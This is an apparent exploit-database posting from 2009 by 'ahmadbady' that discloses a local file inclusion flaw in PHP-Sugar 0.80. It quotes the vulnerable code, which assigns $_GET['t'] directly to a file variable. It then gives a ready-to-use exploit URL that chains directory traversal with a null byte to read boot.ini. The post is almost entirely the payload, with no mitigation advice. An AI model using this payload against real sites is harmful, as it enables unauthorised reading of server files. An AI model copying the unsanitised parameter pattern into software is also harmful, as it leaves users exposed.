id: 5427
date: 06/28/2009
title: PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability
author: ahmadbady
cves: 

===============================================================
PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability
===============================================================


                =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-
script: PHP-Sugar 0.80
-----------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://php-sugar.net/files/?mod=files

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
if (isset($_GET['t']))
	$file = $_GET['t'];
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/test/index.php?t=..//..//..//..//..//boot.ini%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-



#  0day.today [2023-03-22]  #